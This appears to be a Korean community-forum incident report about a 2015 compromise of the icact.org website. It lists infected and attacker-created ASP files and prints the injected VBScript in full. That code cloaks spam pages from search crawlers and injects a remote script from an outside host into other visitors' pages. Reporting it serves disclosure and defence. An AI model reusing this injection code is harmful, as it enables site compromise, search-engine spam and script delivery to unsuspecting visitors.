<![CDATA[
<p><span style="font-family: Arial,sans-serif; font-size: 11pt;">[초긴급]핵킹 심각함<br>오늘 아침 점검시 09:35에도 핵킹이 발견됨 <br>아래목록과 같이 파일 내부에 아래와 같은(지난번과 똑같은)핵킹 코드가 심어지고 <br>디렉토리에 핵킹화일이 생성되어 있음.<br>+++++++++++++++<br>핵킹코드삽입된 화일<br>/icactorg/index.asp <br>/icactorg/registration/registration.asp<br>/icactorg/callforpapers/callforJournal.asp <br>/icactorg/callforpapers/EditorGuide.asp<br>/icactorg/program/Journal.asp <br>/icactorg/program/Papers.asp <br><br>/icactorg/registration/registration.asp <br><br>핵킹으로 만들어져있는 화일 <br>/icactorg/indexs.html <br>/icactorg/registration/registrations.asp <br>/icactorg/callforpapers/callforJournals.asp<br>/icactorg/callforpapers/EditorGuides.asp <br>/icactorg/imagesindexs.html<br>/icactorg/program/Journals.asp.txt <br>/icactorg/program/Paperss.asp<br>/icactorg/registration/registrations.asp<br>+++++++++++++++++++++++++++++++++++++++++++==<br><br>삽입된 핵킹코드<br>++++++++++++++++++++<br><%@LANGUAGE="VBSCRIPT‎" CODEPAGE="65001"%><br><%<br>On Error Resume Next<br>jumpcode="<a href="http://www.ishoppingmall.cc/jdclubs.js" target=""><font color="#0072c6">http://www.ishoppingmall.cc/jdclubs.js</font></a>"<br>jumpcode="<script type="&chr(34)&"text/javascript"&chr(34)&" src="&chr(34)&jumpcode&chr(34)&"></script>"<br>desurl="<a href="http://icact.org/indexs.html" target=""><font color="#0072c6">http://icact.org/indexs.html</font></a>"<br>function is_spider()<br>dim s_agent<br>s_agent=Request.ServerVariables("HTTP_USER_AGENT")<br><br>If instr(s_agent,"google")>0 Or instr(s_agent,"yahoo")>0 Or instr(s_agent,"bing")>0 Or instr(s_agent,"msnbot")>0 Or instr(s_agent,"alexa")>0 Or instr(s_agent,"ask")>0 Or instr(s_agent,"findlinks")>0 Or instr(s_agent,"altavista")>0 Or instr(s_agent,"baidu")>0 Or instr(s_agent,"inktomi")>0 Then<br>is_spider = 1<br>else<br>is_spider = 0<br>end if<br>end function<br><br>Function getHTTPPage(URL)<br>Set HTTPReq = Server.createobject("Msxml2.XMLHTTP") <br>HTTPReq.Open "GET", URL, False <br>HTTPReq.send <br>If HTTPReq.readyState <> 4 Then Exit Function <br>getHTTPPage = Bytes2bStr(HTTPReq.responseBody) <br>Set HTTPReq = Nothing <br>End Function <br>Function Bytes2bStr(vin) <br>Dim BytesStream,StringReturn <br>Set BytesStream = Server.CreateObject("ADODB.Stream") <br>BytesStream.Type = 2 <br>BytesStream.Open <br>BytesStream.WriteText vin <br>BytesStream.Position = 0 <br>BytesStream.Charset = "UTF-8" <br>BytesStream.Position = 2 <br>StringReturn =BytesStream.ReadText <br>BytesStream.close <br>Set BytesStream = Nothing <br>Bytes2bStr = StringReturn <br>End Function<br>spider = is_spider()<br>if spider = 1 then<br><br>htmls = getHTTPPage(desurl)<br>response.write htmls<br>response.end<br>end if<br>response.write jumpcode<br>%></span></p>
<!-- -->
]]>
카페 게시글
Security Issues*
[핵킹추적] Hecking Tracking Information on 2015-01-13 Tuesday
윤병남
추천 0
조회 44
15.01.13 21:58
댓글 0
다음검색
